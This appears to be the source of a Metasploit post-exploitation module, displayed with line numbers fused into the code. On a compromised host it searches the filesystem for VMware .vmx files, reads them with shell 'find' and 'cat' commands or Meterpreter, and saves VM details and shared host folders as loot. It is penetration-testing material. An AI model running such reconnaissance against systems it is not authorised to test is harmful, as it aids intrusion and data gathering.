Path: blob/master/modules/post/multi/gather/find_vmx.rb
19851 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'yaml'67class MetasploitModule < Msf::Post8include Msf::Post::File910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Multi Gather VMWare VM Identification',15'Description' => %q{16This module will attempt to find any VMWare virtual machines stored on the target.17},18'License' => MSF_LICENSE,19'Author' => ['theLightCosine'],20'Platform' => %w[bsd linux osx unix win],21'SessionTypes' => ['shell', 'meterpreter' ],22'Compat' => {23'Meterpreter' => {24'Commands' => %w[25core_channel_eof26core_channel_open27core_channel_read28core_channel_write29stdapi_fs_search30]31}32},33'Notes' => {34'Stability' => [CRASH_SAFE],35'SideEffects' => [],36'Reliability' => []37}38)39)40end4142def run43if session_has_search_ext44vms = meterp_search45elsif session.platform =~ /unix|linux|bsd|osx/46vms = nix_shell_search47end48report_vms(vms) if vms49end5051def report_vms(vms)52output = "VMWare Virtual Machines\n"53output << "--------------------------------\n"54vms.each do |vm|55next if vm.empty?5657output << "Name: #{vm['name']}\n"58output << "Virtual CPUs: #{vm['cpus']}\n"59output << "Memory: #{vm['memsize']}\n"60output << "Operating System: #{vm['os']}\n"61output << "Network Type: #{vm['eth_type']}\n"62output << "MAC Address: #{vm['mac']}\n"63output << "Shared Folders:\n"64vm['SharedFolders'].each do |folder|65output << "\tHost Location: #{folder}\n"66end67output << "\n"68end69print_good output70store_loot('vmware_vms', 'text/plain', session, output, 'vmware_vms.txt', 'VMWare Virtual Machines')71end7273def nix_shell_search74vms = []75res = session.shell_command('find / -name "*.vmx" -type f -print 2>/dev/null')76res.each_line do |filename|77next unless filename.start_with? '/'7879begin80parse = session.shell_command("cat #{filename}")81vms << parse_vmx(parse, filename)82rescue StandardError83print_error "Could not read #{filename} properly"84end85end86return vms87end8889def meterp_search90vms = []91res = session.fs.file.search(nil, '*.vmx', true, -1)92res.each do |vmx|93filename = "#{vmx['path']}\\#{vmx['name']}"94next if filename.end_with? '.vmxf'9596begin97config = client.fs.file.new(filename, 'r')98parse = config.read99vms << parse_vmx(parse, filename)100rescue StandardError101print_error "Could not read #{filename} properly"102end103end104return vms105end106107def parse_vmx(vmx_data, filename)108vm = {}109unless vmx_data.nil? || vmx_data.empty?110vm['SharedFolders'] = []111vmx_data.each_line do |line|112data = line.split('=')113vm['path'] = filename114case data[0]115when 'memsize '116vm['memsize'] = data[1].gsub!('"', '').lstrip.chomp117when 'displayName '118vm['name'] = data[1].gsub!('"', '').lstrip.chomp119when 'guestOS '120vm['os'] = data[1].gsub!('"', '').lstrip.chomp121when 'ethernet0.connectionType '122vm['eth_type'] = data[1].gsub!('"', '').lstrip.chomp123when 'ethernet0.generatedAddress '124vm['mac'] = data[1].gsub!('"', '').lstrip.chomp125when 'numvcpus '126vm['cpus'] = data[1].gsub!('"', '').lstrip.chomp127when 'sharedFolder0.hostPath '128vm['SharedFolders'] << data[1].gsub!('"', '').lstrip.chomp129end130end131vm['cpus'] ||= '1'132end133return vm134end135136def session_has_search_ext137return !!(session.fs and session.fs.file)138rescue NoMethodError139return false140end141142end143144145